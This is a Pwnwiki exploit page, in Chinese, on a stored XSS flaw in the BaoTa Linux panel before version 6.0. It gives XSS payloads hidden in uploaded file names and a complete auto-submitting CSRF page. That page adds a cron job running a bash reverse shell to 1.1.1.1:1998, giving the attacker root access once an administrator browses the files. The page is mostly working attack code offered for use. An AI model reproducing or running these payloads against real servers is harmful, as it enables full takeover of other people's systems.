Pwnwiki: Created page with "宝塔linux面板 6.0 存储型XSS Getshell漏洞"

2021-06-26T00:13:45Z

Created page with "宝塔linux面板 6.0 存储型XSS Getshell漏洞"

New page

<languages />
==漏洞影响==
宝塔Linux面板<6.0

==漏洞利用==
在web目录下上传一个文件名为<code><img src=x onerror="alert(1)"></code>的文件
宝塔后台浏览文件,触发payload

Get cookie:
<pre>
<html>

<body>
<script>history.pushState('', '', '/')</script>
<form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="type" value="minute-n" />
<input type="hidden" name="where1" value="5" />
<input type="hidden" name="hour" value="" />
<input type="hidden" name="minute" value="" />
<input type="hidden" name="week" value="" />
<input type="hidden" name="sType" value="toShell" />
<input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
<input type="hidden" name="sName" value="" />
<input type="hidden" name="backupTo" value="localhost" />
<input type="hidden" name="urladdress" value="" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
<input type="hidden" name="urladdress" value="" />
<input type="submit" id="a" value="Submit request" />
</form>
</body>
<script>
document.getElementById('a').click()
</script>
</html>
</pre>

修改poc中的ip地址,上传到test.com中,当宝塔管理员访问这个页面以后,会自动添加反弹shell的计划任务

新建三个文件,文件名分别为：
<pre>
a<img src=x onerror="a=String.fromCharCode(47)">
b<img src=x onerror="b='.com'">
c<img src=x onerror="window.open(a+a+'test'+b)">
</pre>

payload触发以后会自动打开test.com网页

将上一步CSRF的payload部署到test.com,管理员浏览文件的时候即可触发,触发后五分钟会反弹shell（ROOT权限）

寶塔linux面板 6.0 存儲型XSS Getshell漏洞/zh-cn - Revision history

Pwnwiki: Created page with "宝塔linux面板 6.0 存储型XSS Getshell漏洞"